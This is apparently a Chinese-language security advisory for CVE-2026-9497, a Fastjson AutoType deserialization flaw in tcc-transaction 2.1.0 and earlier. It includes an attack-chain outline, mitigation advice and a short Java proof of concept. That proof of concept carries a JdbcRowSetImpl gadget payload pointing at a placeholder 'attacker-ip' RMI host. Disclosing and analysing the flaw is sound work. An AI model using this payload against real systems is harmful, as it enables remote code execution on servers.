CVE-2026-9497 CVSS 6.3 中危

CVE-2026-9497 tcc-transaction Fastjson反序列化漏洞

披露日期: 2026-05-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-9497

漏洞类型

反序列化漏洞

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

changmingxie tcc-transaction

漏洞概述

changmingxie tcc-transaction 2.1.0及以下版本存在安全漏洞。该漏洞源于组件Fastjson AutoType REST API中的Fastjson.parseObject函数未能正确处理反序列化数据。攻击者可利用此漏洞远程发起攻击，无需用户交互，仅需低权限即可造成数据泄露、篡改或服务中断。

技术细节

该漏洞位于changmingxie tcc-transaction项目的Fastjson集成部分。由于组件在处理REST API请求时，调用了Fastjson.parseObject方法并开启了AutoType功能，且未对传入的恶意数据进行严格的过滤或校验，导致攻击者可以构造恶意的JSON数据。当系统解析这些数据时，Fastjson会自动反序列化指定的恶意类，进而触发远程代码执行。攻击者通过网络发起攻击，成功利用可获取服务器权限，造成机密性、完整性和可用性的全面破坏。

攻击链分析

STEP 1

侦察

攻击者识别出目标服务器使用了changmingxie tcc-transaction组件，且版本在2.1.0及以下。

STEP 2

构造Payload

攻击者利用Fastjson的AutoType特性，构造包含恶意类引用（如JNDI注入利用链）的JSON数据。

STEP 3

发送请求

攻击者通过网络向存在漏洞的Fastjson AutoType REST API接口发送特制的恶意HTTP请求。

STEP 4

触发漏洞

服务器端调用Fastjson.parseObject解析恶意JSON，自动反序列化指定类，执行恶意代码。

STEP 5

获取控制权

成功利用漏洞后，攻击者可在服务器上执行任意命令，获取系统权限，窃取数据或破坏服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// Conceptual PoC for CVE-2026-9497
// Target: Fastjson.parseObject with AutoType enabled

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.ParserConfig;

public class Exploit {
    public static void main(String[] args) {
        // Malicious payload targeting a known gadget chain (e.g., JdbcRowSetImpl)
        String payload = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://attacker-ip:1099/exploit\",\"autoCommit\":true}";

        // Simulate the vulnerable API endpoint processing the input
        try {
            // This triggers the deserialization vulnerability
            Object obj = JSON.parseObject(payload);
            System.out.println("Deserialization successful: " + obj);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

影响范围

changmingxie tcc-transaction <= 2.1.0

防御指南

临时缓解措施

建议立即检查并禁用应用中Fastjson库的AutoType支持。如果必须使用，请务必配置严格的白名单。同时，应限制受影响REST API端点的网络访问权限，仅允许可信来源调用，并在网络边界部署防御规则以拦截包含恶意@type特征的请求。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-9497
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-9497
3 Details https://www.cvedetails.com/cve/CVE-2026-9497/
4 VulDB https://vuldb.com/cve/CVE-2026-9497
5 Link https://github.com/Ku4D3/bug_story/blob/main/report_01.md
6 Link https://vuldb.com/submit/814092
7 Link https://vuldb.com/vuln/365480
8 Link https://vuldb.com/vuln/365480/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表